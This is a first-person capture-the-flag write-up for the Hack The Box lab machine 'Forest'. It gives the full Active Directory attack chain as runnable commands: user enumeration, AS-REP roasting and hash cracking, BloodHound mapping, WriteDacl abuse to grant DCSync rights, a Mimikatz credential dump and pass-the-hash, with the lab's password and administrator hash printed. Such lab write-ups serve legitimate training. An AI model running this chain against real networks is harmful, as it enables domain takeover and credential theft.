ForestJanuary 30, 2025 Created by Page Difficulty OS egre55 & mrb3n Hack The Box Easy Windows The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports. nmap -p- --open --min-rate 5000 -Pn -sS 10.10.10.161 -oG scan /opt/extractports scan nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49676,49677,49684,49706 -Pn -sCV 10.10.10.161 -oN ports I found the domain htb.local and forest.htb.local, I added it to the file in the hosts file I enumerate the system with enum4linux looking for system users. I get a list of users that I validate kerbrute to keep only the valid ones of the domain. enum4linux -a 10.10.10.161 /opt/kerbrute userenum --dc 10.10.10.161 -d htb.local /home/rufo/users When checking if any user has SPN set to request a TGS. impacket-GetNPUsers htb.local/ -no-pass -usersfile /home/rufo/valid_users I find a user and manage to crack his hash and get the password in clear text. hashcat -m 18200 hash_svc-alfresco /usr/share/wordlists/rockyou.txt With these credentials I get access to the system through winrm and read the first flag evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice At this point I collect information from the system in order to use bloodhound and look for possible routes to escalate my privileges. neo4j console rdate -n 10.10.10.161 bloodhound-python -c all -u svc-alfresco -p s3rvice -ns 10.10.10.161 -d htb.local bloodhound &>/dev/null & I find a way in which I can give myself permissions to perform a DcSync attack. For it first I have to add me to the group “EXCHANGE WINDOWS PERMISSIONS” and at that point I can give me the permissions thanks to have WriteDacl on the domain. In order to exploit WriteDacl I make use of this resource Add-ADGroupMember -Identity "EXCHANGE WINDOWS PERMISSIONS" -Members "svc-alfresco" ./bloodyAD.py --host "10.10.10.161" -d "htb.local" -u "svc-alfresco" -p "s3rvice" add dcsync "svc-alfresco" .\mimikatz.exe privilege::debug "lsadump::dcsync /domain:htb.local /user:Administrator" exit Another way in which we could give DcSync permissions to the user would be to use powerview $pass = ConvertTo-SecureString 's3rvice' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('htb.local\svc-alfresco', $pass) Add-DomainObjectAcl -PrincipalIdentity svc-alfresco -Credential $cred -Rights DCSync When I get the Administrator user hash I manage to PtH and connect to the system to be able to read the second flag. evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6